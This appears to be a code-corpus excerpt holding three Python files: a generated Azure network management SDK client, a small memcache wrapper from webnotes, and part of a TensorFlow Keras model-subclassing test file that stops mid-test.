from .operations import NetworkInterfaceIPConfigurationsOperations
from .operations import NetworkInterfaceLoadBalancersOperations
from .operations import NetworkInterfaceTapConfigurationsOperations
from .operations import NetworkProfilesOperations
from .operations import NetworkSecurityGroupsOperations
from .operations import SecurityRulesOperations
from .operations import DefaultSecurityRulesOperations
from .operations import NetworkWatchersOperations
from .operations import PacketCapturesOperations
from .operations import ConnectionMonitorsOperations
from .operations import Operations
from .operations import PublicIPAddressesOperations
from .operations import PublicIPPrefixesOperations
from .operations import RouteFiltersOperations
from .operations import RouteFilterRulesOperations
from .operations import RouteTablesOperations
from .operations import RoutesOperations
from .operations import BgpServiceCommunitiesOperations
from .operations import ServiceEndpointPoliciesOperations
from .operations import ServiceEndpointPolicyDefinitionsOperations
from .operations import UsagesOperations
from .operations import VirtualNetworksOperations
from .operations import SubnetsOperations
from .operations import ResourceNavigationLinksOperations
from .operations import ServiceAssociationLinksOperations
from .operations import VirtualNetworkPeeringsOperations
from .operations import VirtualNetworkGatewaysOperations
from .operations import VirtualNetworkGatewayConnectionsOperations
from .operations import LocalNetworkGatewaysOperations
from .operations import VirtualNetworkTapsOperations
from .operations import VirtualWansOperations
from .operations import VpnSitesOperations
from .operations import VpnSitesConfigurationOperations
from .operations import VirtualHubsOperations
from .operations import HubVirtualNetworkConnectionsOperations
from .operations import VpnGatewaysOperations
from .operations import VpnConnectionsOperations
from .operations import P2SVpnServerConfigurationsOperations
from .operations import P2SVpnGatewaysOperations
from .operations import WebApplicationFirewallPoliciesOperations
from . import models
class NetworkManagementClient(NetworkManagementClientOperationsMixin):
"""Network Client.
:ivar application_gateways: ApplicationGatewaysOperations operations
:vartype application_gateways: azure.mgmt.network.v2019_02_01.operations.ApplicationGatewaysOperations
:ivar application_security_groups: ApplicationSecurityGroupsOperations operations
:vartype application_security_groups: azure.mgmt.network.v2019_02_01.operations.ApplicationSecurityGroupsOperations
:ivar available_delegations: AvailableDelegationsOperations operations
:vartype available_delegations: azure.mgmt.network.v2019_02_01.operations.AvailableDelegationsOperations
:ivar available_resource_group_delegations: AvailableResourceGroupDelegationsOperations operations
:vartype available_resource_group_delegations: azure.mgmt.network.v2019_02_01.operations.AvailableResourceGroupDelegationsOperations
:ivar azure_firewalls: AzureFirewallsOperations operations
:vartype azure_firewalls: azure.mgmt.network.v2019_02_01.operations.AzureFirewallsOperations
:ivar azure_firewall_fqdn_tags: AzureFirewallFqdnTagsOperations operations
:vartype azure_firewall_fqdn_tags: azure.mgmt.network.v2019_02_01.operations.AzureFirewallFqdnTagsOperations
:ivar ddos_custom_policies: DdosCustomPoliciesOperations operations
:vartype ddos_custom_policies: azure.mgmt.network.v2019_02_01.operations.DdosCustomPoliciesOperations
:ivar ddos_protection_plans: DdosProtectionPlansOperations operations
:vartype ddos_protection_plans: azure.mgmt.network.v2019_02_01.operations.DdosProtectionPlansOperations
:ivar available_endpoint_services: AvailableEndpointServicesOperations operations
:vartype available_endpoint_services: azure.mgmt.network.v2019_02_01.operations.AvailableEndpointServicesOperations
:ivar express_route_circuit_authorizations: ExpressRouteCircuitAuthorizationsOperations operations
:vartype express_route_circuit_authorizations: azure.mgmt.network.v2019_02_01.operations.ExpressRouteCircuitAuthorizationsOperations
:ivar express_route_circuit_peerings: ExpressRouteCircuitPeeringsOperations operations
:vartype express_route_circuit_peerings: azure.mgmt.network.v2019_02_01.operations.ExpressRouteCircuitPeeringsOperations
:ivar express_route_circuit_connections: ExpressRouteCircuitConnectionsOperations operations
:vartype express_route_circuit_connections: azure.mgmt.network.v2019_02_01.operations.ExpressRouteCircuitConnectionsOperations
:ivar peer_express_route_circuit_connections: PeerExpressRouteCircuitConnectionsOperations operations
:vartype peer_express_route_circuit_connections: azure.mgmt.network.v2019_02_01.operations.PeerExpressRouteCircuitConnectionsOperations
:ivar express_route_circuits: ExpressRouteCircuitsOperations operations
:vartype express_route_circuits: azure.mgmt.network.v2019_02_01.operations.ExpressRouteCircuitsOperations
:ivar express_route_service_providers: ExpressRouteServiceProvidersOperations operations
:vartype express_route_service_providers: azure.mgmt.network.v2019_02_01.operations.ExpressRouteServiceProvidersOperations
:ivar express_route_cross_connections: ExpressRouteCrossConnectionsOperations operations
:vartype express_route_cross_connections: azure.mgmt.network.v2019_02_01.operations.ExpressRouteCrossConnectionsOperations
:ivar express_route_cross_connection_peerings: ExpressRouteCrossConnectionPeeringsOperations operations
:vartype express_route_cross_connection_peerings: azure.mgmt.network.v2019_02_01.operations.ExpressRouteCrossConnectionPeeringsOperations
:ivar express_route_gateways: ExpressRouteGatewaysOperations operations
:vartype express_route_gateways: azure.mgmt.network.v2019_02_01.operations.ExpressRouteGatewaysOperations
:ivar express_route_connections: ExpressRouteConnectionsOperations operations
:vartype express_route_connections: azure.mgmt.network.v2019_02_01.operations.ExpressRouteConnectionsOperations
:ivar express_route_ports_locations: ExpressRoutePortsLocationsOperations operations
:vartype express_route_ports_locations: azure.mgmt.network.v2019_02_01.operations.ExpressRoutePortsLocationsOperations
:ivar express_route_ports: ExpressRoutePortsOperations operations
:vartype express_route_ports: azure.mgmt.network.v2019_02_01.operations.ExpressRoutePortsOperations
:ivar express_route_links: ExpressRouteLinksOperations operations
:vartype express_route_links: azure.mgmt.network.v2019_02_01.operations.ExpressRouteLinksOperations
:ivar interface_endpoints: InterfaceEndpointsOperations operations
:vartype interface_endpoints: azure.mgmt.network.v2019_02_01.operations.InterfaceEndpointsOperations
:ivar load_balancers: LoadBalancersOperations operations
:vartype load_balancers: azure.mgmt.network.v2019_02_01.operations.LoadBalancersOperations
:ivar load_balancer_backend_address_pools: LoadBalancerBackendAddressPoolsOperations operations
:vartype load_balancer_backend_address_pools: azure.mgmt.network.v2019_02_01.operations.LoadBalancerBackendAddressPoolsOperations
:ivar load_balancer_frontend_ip_configurations: LoadBalancerFrontendIPConfigurationsOperations operations
:vartype load_balancer_frontend_ip_configurations: azure.mgmt.network.v2019_02_01.operations.LoadBalancerFrontendIPConfigurationsOperations
:ivar inbound_nat_rules: InboundNatRulesOperations operations
:vartype inbound_nat_rules: azure.mgmt.network.v2019_02_01.operations.InboundNatRulesOperations
:ivar load_balancer_load_balancing_rules: LoadBalancerLoadBalancingRulesOperations operations
:vartype load_balancer_load_balancing_rules: azure.mgmt.network.v2019_02_01.operations.LoadBalancerLoadBalancingRulesOperations
:ivar load_balancer_outbound_rules: LoadBalancerOutboundRulesOperations operations
:vartype load_balancer_outbound_rules: azure.mgmt.network.v2019_02_01.operations.LoadBalancerOutboundRulesOperations
:ivar load_balancer_network_interfaces: LoadBalancerNetworkInterfacesOperations operations
:vartype load_balancer_network_interfaces: azure.mgmt.network.v2019_02_01.operations.LoadBalancerNetworkInterfacesOperations
:ivar load_balancer_probes: LoadBalancerProbesOperations operations
:vartype load_balancer_probes: azure.mgmt.network.v2019_02_01.operations.LoadBalancerProbesOperations
:ivar nat_gateways: NatGatewaysOperations operations
:vartype nat_gateways: azure.mgmt.network.v2019_02_01.operations.NatGatewaysOperations
:ivar network_interfaces: NetworkInterfacesOperations operations
:vartype network_interfaces: azure.mgmt.network.v2019_02_01.operations.NetworkInterfacesOperations
:ivar network_interface_ip_configurations: NetworkInterfaceIPConfigurationsOperations operations
:vartype network_interface_ip_configurations: azure.mgmt.network.v2019_02_01.operations.NetworkInterfaceIPConfigurationsOperations
:ivar network_interface_load_balancers: NetworkInterfaceLoadBalancersOperations operations
:vartype network_interface_load_balancers: azure.mgmt.network.v2019_02_01.operations.NetworkInterfaceLoadBalancersOperations
:ivar network_interface_tap_configurations: NetworkInterfaceTapConfigurationsOperations operations
:vartype network_interface_tap_configurations: azure.mgmt.network.v2019_02_01.operations.NetworkInterfaceTapConfigurationsOperations
:ivar network_profiles: NetworkProfilesOperations operations
:vartype network_profiles: azure.mgmt.network.v2019_02_01.operations.NetworkProfilesOperations
:ivar network_security_groups: NetworkSecurityGroupsOperations operations
:vartype network_security_groups: azure.mgmt.network.v2019_02_01.operations.NetworkSecurityGroupsOperations
:ivar security_rules: SecurityRulesOperations operations
:vartype security_rules: azure.mgmt.network.v2019_02_01.operations.SecurityRulesOperations
:ivar default_security_rules: DefaultSecurityRulesOperations operations
:vartype default_security_rules: azure.mgmt.network.v2019_02_01.operations.DefaultSecurityRulesOperations
:ivar network_watchers: NetworkWatchersOperations operations
:vartype network_watchers: azure.mgmt.network.v2019_02_01.operations.NetworkWatchersOperations
:ivar packet_captures: PacketCapturesOperations operations
:vartype packet_captures: azure.mgmt.network.v2019_02_01.operations.PacketCapturesOperations
:ivar connection_monitors: ConnectionMonitorsOperations operations
:vartype connection_monitors: azure.mgmt.network.v2019_02_01.operations.ConnectionMonitorsOperations
:ivar operations: Operations operations
:vartype operations: azure.mgmt.network.v2019_02_01.operations.Operations
:ivar public_ip_addresses: PublicIPAddressesOperations operations
:vartype public_ip_addresses: azure.mgmt.network.v2019_02_01.operations.PublicIPAddressesOperations
:ivar public_ip_prefixes: PublicIPPrefixesOperations operations
:vartype public_ip_prefixes: azure.mgmt.network.v2019_02_01.operations.PublicIPPrefixesOperations
:ivar route_filters: RouteFiltersOperations operations
:vartype route_filters: azure.mgmt.network.v2019_02_01.operations.RouteFiltersOperations
:ivar route_filter_rules: RouteFilterRulesOperations operations
:vartype route_filter_rules: azure.mgmt.network.v2019_02_01.operations.RouteFilterRulesOperations
:ivar route_tables: RouteTablesOperations operations
:vartype route_tables: azure.mgmt.network.v2019_02_01.operations.RouteTablesOperations
:ivar routes: RoutesOperations operations
:vartype routes: azure.mgmt.network.v2019_02_01.operations.RoutesOperations
:ivar bgp_service_communities: BgpServiceCommunitiesOperations operations
:vartype bgp_service_communities: azure.mgmt.network.v2019_02_01.operations.BgpServiceCommunitiesOperations
:ivar service_endpoint_policies: ServiceEndpointPoliciesOperations operations
:vartype service_endpoint_policies: azure.mgmt.network.v2019_02_01.operations.ServiceEndpointPoliciesOperations
:ivar service_endpoint_policy_definitions: ServiceEndpointPolicyDefinitionsOperations operations
:vartype service_endpoint_policy_definitions: azure.mgmt.network.v2019_02_01.operations.ServiceEndpointPolicyDefinitionsOperations
:ivar usages: UsagesOperations operations
:vartype usages: azure.mgmt.network.v2019_02_01.operations.UsagesOperations
:ivar virtual_networks: VirtualNetworksOperations operations
:vartype virtual_networks: azure.mgmt.network.v2019_02_01.operations.VirtualNetworksOperations
:ivar subnets: SubnetsOperations operations
:vartype subnets: azure.mgmt.network.v2019_02_01.operations.SubnetsOperations
:ivar resource_navigation_links: ResourceNavigationLinksOperations operations
:vartype resource_navigation_links: azure.mgmt.network.v2019_02_01.operations.ResourceNavigationLinksOperations
:ivar service_association_links: ServiceAssociationLinksOperations operations
:vartype service_association_links: azure.mgmt.network.v2019_02_01.operations.ServiceAssociationLinksOperations
:ivar virtual_network_peerings: VirtualNetworkPeeringsOperations operations
:vartype virtual_network_peerings: azure.mgmt.network.v2019_02_01.operations.VirtualNetworkPeeringsOperations
:ivar virtual_network_gateways: VirtualNetworkGatewaysOperations operations
:vartype virtual_network_gateways: azure.mgmt.network.v2019_02_01.operations.VirtualNetworkGatewaysOperations
:ivar virtual_network_gateway_connections: VirtualNetworkGatewayConnectionsOperations operations
:vartype virtual_network_gateway_connections: azure.mgmt.network.v2019_02_01.operations.VirtualNetworkGatewayConnectionsOperations
:ivar local_network_gateways: LocalNetworkGatewaysOperations operations
:vartype local_network_gateways: azure.mgmt.network.v2019_02_01.operations.LocalNetworkGatewaysOperations
:ivar virtual_network_taps: VirtualNetworkTapsOperations operations
:vartype virtual_network_taps: azure.mgmt.network.v2019_02_01.operations.VirtualNetworkTapsOperations
:ivar virtual_wans: VirtualWansOperations operations
:vartype virtual_wans: azure.mgmt.network.v2019_02_01.operations.VirtualWansOperations
:ivar vpn_sites: VpnSitesOperations operations
:vartype vpn_sites: azure.mgmt.network.v2019_02_01.operations.VpnSitesOperations
:ivar vpn_sites_configuration: VpnSitesConfigurationOperations operations
:vartype vpn_sites_configuration: azure.mgmt.network.v2019_02_01.operations.VpnSitesConfigurationOperations
:ivar virtual_hubs: VirtualHubsOperations operations
:vartype virtual_hubs: azure.mgmt.network.v2019_02_01.operations.VirtualHubsOperations
:ivar hub_virtual_network_connections: HubVirtualNetworkConnectionsOperations operations
:vartype hub_virtual_network_connections: azure.mgmt.network.v2019_02_01.operations.HubVirtualNetworkConnectionsOperations
:ivar vpn_gateways: VpnGatewaysOperations operations
:vartype vpn_gateways: azure.mgmt.network.v2019_02_01.operations.VpnGatewaysOperations
:ivar vpn_connections: VpnConnectionsOperations operations
:vartype vpn_connections: azure.mgmt.network.v2019_02_01.operations.VpnConnectionsOperations
:ivar p2_svpn_server_configurations: P2SVpnServerConfigurationsOperations operations
:vartype p2_svpn_server_configurations: azure.mgmt.network.v2019_02_01.operations.P2SVpnServerConfigurationsOperations
:ivar p2_svpn_gateways: P2SVpnGatewaysOperations operations
:vartype p2_svpn_gateways: azure.mgmt.network.v2019_02_01.operations.P2SVpnGatewaysOperations
:ivar web_application_firewall_policies: WebApplicationFirewallPoliciesOperations operations
:vartype web_application_firewall_policies: azure.mgmt.network.v2019_02_01.operations.WebApplicationFirewallPoliciesOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials.TokenCredential
:param subscription_id: The subscription credentials which uniquely identify the Microsoft Azure subscription. The subscription ID forms part of the URI for every service call.
:type subscription_id: str
:param str base_url: Service URL
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
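    Example (an illustrative sketch, not part of the generated reference;
    ``DefaultAzureCredential`` comes from the separate ``azure-identity``
    package and the subscription ID below is a placeholder)::

        from azure.identity import DefaultAzureCredential

        client = NetworkManagementClient(DefaultAzureCredential(), "<subscription-id>")
        for vnet in client.virtual_networks.list_all():
            print(vnet.name)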
"""
def __init__(
self,
credential, # type: "TokenCredential"
subscription_id, # type: str
base_url=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> None
if not base_url:
base_url = 'https://management.azure.com'
self._config = NetworkManagementClientConfiguration(credential, subscription_id, **kwargs)
self._client = ARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._serialize.client_side_validation = False
self._deserialize = Deserializer(client_models)
self.application_gateways = ApplicationGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.application_security_groups = ApplicationSecurityGroupsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.available_delegations = AvailableDelegationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.available_resource_group_delegations = AvailableResourceGroupDelegationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.azure_firewalls = AzureFirewallsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.azure_firewall_fqdn_tags = AzureFirewallFqdnTagsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.ddos_custom_policies = DdosCustomPoliciesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.ddos_protection_plans = DdosProtectionPlansOperations(
self._client, self._config, self._serialize, self._deserialize)
self.available_endpoint_services = AvailableEndpointServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_circuit_authorizations = ExpressRouteCircuitAuthorizationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_circuit_peerings = ExpressRouteCircuitPeeringsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_circuit_connections = ExpressRouteCircuitConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.peer_express_route_circuit_connections = PeerExpressRouteCircuitConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_circuits = ExpressRouteCircuitsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_service_providers = ExpressRouteServiceProvidersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_cross_connections = ExpressRouteCrossConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_cross_connection_peerings = ExpressRouteCrossConnectionPeeringsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_gateways = ExpressRouteGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_connections = ExpressRouteConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_ports_locations = ExpressRoutePortsLocationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_ports = ExpressRoutePortsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.express_route_links = ExpressRouteLinksOperations(
self._client, self._config, self._serialize, self._deserialize)
self.interface_endpoints = InterfaceEndpointsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancers = LoadBalancersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_backend_address_pools = LoadBalancerBackendAddressPoolsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_frontend_ip_configurations = LoadBalancerFrontendIPConfigurationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.inbound_nat_rules = InboundNatRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_load_balancing_rules = LoadBalancerLoadBalancingRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_outbound_rules = LoadBalancerOutboundRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_network_interfaces = LoadBalancerNetworkInterfacesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.load_balancer_probes = LoadBalancerProbesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.nat_gateways = NatGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_interfaces = NetworkInterfacesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_interface_ip_configurations = NetworkInterfaceIPConfigurationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_interface_load_balancers = NetworkInterfaceLoadBalancersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_interface_tap_configurations = NetworkInterfaceTapConfigurationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_profiles = NetworkProfilesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_security_groups = NetworkSecurityGroupsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.security_rules = SecurityRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.default_security_rules = DefaultSecurityRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.network_watchers = NetworkWatchersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.packet_captures = PacketCapturesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.connection_monitors = ConnectionMonitorsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.operations = Operations(
self._client, self._config, self._serialize, self._deserialize)
self.public_ip_addresses = PublicIPAddressesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.public_ip_prefixes = PublicIPPrefixesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.route_filters = RouteFiltersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.route_filter_rules = RouteFilterRulesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.route_tables = RouteTablesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.routes = RoutesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.bgp_service_communities = BgpServiceCommunitiesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.service_endpoint_policies = ServiceEndpointPoliciesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.service_endpoint_policy_definitions = ServiceEndpointPolicyDefinitionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.usages = UsagesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_networks = VirtualNetworksOperations(
self._client, self._config, self._serialize, self._deserialize)
self.subnets = SubnetsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.resource_navigation_links = ResourceNavigationLinksOperations(
self._client, self._config, self._serialize, self._deserialize)
self.service_association_links = ServiceAssociationLinksOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_network_peerings = VirtualNetworkPeeringsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_network_gateways = VirtualNetworkGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_network_gateway_connections = VirtualNetworkGatewayConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.local_network_gateways = LocalNetworkGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_network_taps = VirtualNetworkTapsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_wans = VirtualWansOperations(
self._client, self._config, self._serialize, self._deserialize)
self.vpn_sites = VpnSitesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.vpn_sites_configuration = VpnSitesConfigurationOperations(
self._client, self._config, self._serialize, self._deserialize)
self.virtual_hubs = VirtualHubsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.hub_virtual_network_connections = HubVirtualNetworkConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.vpn_gateways = VpnGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.vpn_connections = VpnConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.p2_svpn_server_configurations = P2SVpnServerConfigurationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.p2_svpn_gateways = P2SVpnGatewaysOperations(
self._client, self._config, self._serialize, self._deserialize)
self.web_application_firewall_policies = WebApplicationFirewallPoliciesOperations(
self._client, self._config, self._serialize, self._deserialize)
def _send_request(self, http_request, **kwargs):
# type: (HttpRequest, Any) -> HttpResponse
"""Runs the network request through the client's chained policies.
:param http_request: The network request you want to make. Required.
:type http_request: ~azure.core.pipeline.transport.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to True.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.pipeline.transport.HttpResponse
"""
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
http_request.url = self._client.format_url(http_request.url, **path_format_arguments)
stream = kwargs.pop("stream", True)
pipeline_response = self._client._pipeline.run(http_request, stream=stream, **kwargs)
return pipeline_response.http_response
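    # Illustrative sketch of calling the raw pipeline (the URL below is a
    # placeholder, not a documented endpoint; build a real request from the
    # service's REST reference):
    #   from azure.core.pipeline.transport import HttpRequest
    #   request = HttpRequest("GET", "/subscriptions/{subscriptionId}/providers/Microsoft.Network/virtualNetworks?api-version=2019-02-01")
    #   response = client._send_request(request)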
def close(self):
# type: () -> None
self._client.close()
def __enter__(self):
# type: () -> NetworkManagementClient
self._client.__enter__()
return self
def __exit__(self, *exc_details):
# type: (Any) -> None
self._client.__exit__(*exc_details)
| Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_02_01/_network_management_client.py | Python | mit | 32,278 |
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd.
# MIT License. See license.txt
from __future__ import unicode_literals
import memcache, conf
class MClient(memcache.Client):
"""memcache client that will automatically prefix conf.db_name"""
def n(self, key):
return (conf.db_name + ":" + key.replace(" ", "_")).encode('utf-8')
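	# e.g. with conf.db_name == "mydb" (a hypothetical value),
	# n("user count") returns b"mydb:user_count"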
def set_value(self, key, val):
self.set(self.n(key), val)
def get_value(self, key):
return self.get(self.n(key))
def delete_value(self, key):
self.delete(self.n(key)) | rohitw1991/latestadbwnf | webnotes/memc.py | Python | mit | 522 |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Model subclassing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
import numpy as np
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.keras._impl import keras
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
from tensorflow.python.training.rmsprop import RMSPropOptimizer
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
class SimpleTestModel(keras.Model):
def __init__(self, use_bn=False, use_dp=False, num_classes=10):
super(SimpleTestModel, self).__init__(name='test_model')
self.use_bn = use_bn
self.use_dp = use_dp
self.num_classes = num_classes
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(num_classes, activation='softmax')
if self.use_dp:
self.dp = keras.layers.Dropout(0.5)
if self.use_bn:
self.bn = keras.layers.BatchNormalization(axis=-1)
def call(self, inputs):
x = self.dense1(inputs)
if self.use_dp:
x = self.dp(x)
if self.use_bn:
x = self.bn(x)
return self.dense2(x)
class MultiIOTestModel(keras.Model):
def __init__(self, use_bn=False, use_dp=False, num_classes=(2, 3)):
super(MultiIOTestModel, self).__init__(name='test_model')
self.use_bn = use_bn
self.use_dp = use_dp
self.num_classes = num_classes
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(num_classes[0], activation='softmax')
self.dense3 = keras.layers.Dense(num_classes[1], activation='softmax')
if use_dp:
self.dp = keras.layers.Dropout(0.5)
if use_bn:
self.bn = keras.layers.BatchNormalization()
def call(self, inputs):
x1, x2 = inputs
x1 = self.dense1(x1)
x2 = self.dense1(x2)
if self.use_dp:
x1 = self.dp(x1)
if self.use_bn:
x2 = self.bn(x2)
return [self.dense2(x1), self.dense3(x2)]
class NestedTestModel1(keras.Model):
"""A model subclass nested inside a model subclass.
"""
def __init__(self, num_classes=2):
super(NestedTestModel1, self).__init__(name='nested_model_1')
self.num_classes = num_classes
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(num_classes, activation='relu')
self.bn = keras.layers.BatchNormalization()
self.test_net = SimpleTestModel(num_classes=4,
use_bn=True,
use_dp=True)
def call(self, inputs):
x = self.dense1(inputs)
x = self.bn(x)
x = self.test_net(x) # pylint: disable=not-callable
return self.dense2(x)
def get_functional_graph_model(input_dim, num_classes):
# A simple functional-API model (a.k.a. graph network)
inputs = keras.Input(shape=(input_dim,))
x = keras.layers.Dense(32, activation='relu')(inputs)
x = keras.layers.BatchNormalization()(x)
outputs = keras.layers.Dense(num_classes)(x)
return keras.Model(inputs, outputs)
class NestedTestModel2(keras.Model):
"""A model subclass with a functional-API graph network inside.
"""
def __init__(self, num_classes=2):
super(NestedTestModel2, self).__init__(name='nested_model_2')
self.num_classes = num_classes
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(num_classes, activation='relu')
    self.bn = keras.layers.BatchNormalization()
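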
self.test_net = get_functional_graph_model(32, 4)
def call(self, inputs):
x = self.dense1(inputs)
x = self.bn(x)
x = self.test_net(x)
return self.dense2(x)
def get_nested_model_3(input_dim, num_classes):
# A functional-API model with a subclassed model inside.
# NOTE: this requires the inner subclass to implement `compute_output_shape`.
inputs = keras.Input(shape=(input_dim,))
x = keras.layers.Dense(32, activation='relu')(inputs)
x = keras.layers.BatchNormalization()(x)
class Inner(keras.Model):
def __init__(self):
super(Inner, self).__init__()
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(5, activation='relu')
self.bn = keras.layers.BatchNormalization()
def call(self, inputs):
x = self.dense1(inputs)
x = self.dense2(x)
return self.bn(x)
def compute_output_shape(self, input_shape):
return tensor_shape.TensorShape((input_shape[0], 5))
test_model = Inner()
x = test_model(x) # pylint: disable=not-callable
outputs = keras.layers.Dense(num_classes)(x)
return keras.Model(inputs, outputs, name='nested_model_3')
class ModelSubclassingTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes()
def test_single_io_workflow_with_np_arrays(self):
num_classes = 2
num_samples = 100
input_dim = 50
model = SimpleTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x = np.ones((num_samples, input_dim))
y = np.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, batch_size=32, verbose=0)
_ = model.evaluate(x, y, verbose=0)
@test_util.run_in_graph_and_eager_modes()
def test_multi_io_workflow_with_np_arrays(self):
num_classes = (2, 3)
num_samples = 1000
input_dim = 50
model = MultiIOTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0)
_ = model.evaluate([x1, x2], [y1, y2], verbose=0)
def test_single_io_workflow_with_tensors(self):
num_classes = 2
num_samples = 10
input_dim = 50
with self.test_session():
model = SimpleTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
x = array_ops.ones((num_samples, input_dim))
y = array_ops.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, steps_per_epoch=10, verbose=0)
_ = model.evaluate(steps=10, verbose=0)
def test_multi_io_workflow_with_tensors(self):
num_classes = (2, 3)
num_samples = 10
input_dim = 50
with self.test_session():
model = MultiIOTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
x1 = array_ops.ones((num_samples, input_dim))
x2 = array_ops.ones((num_samples, input_dim))
y1 = array_ops.zeros((num_samples, num_classes[0]))
y2 = array_ops.zeros((num_samples, num_classes[1]))
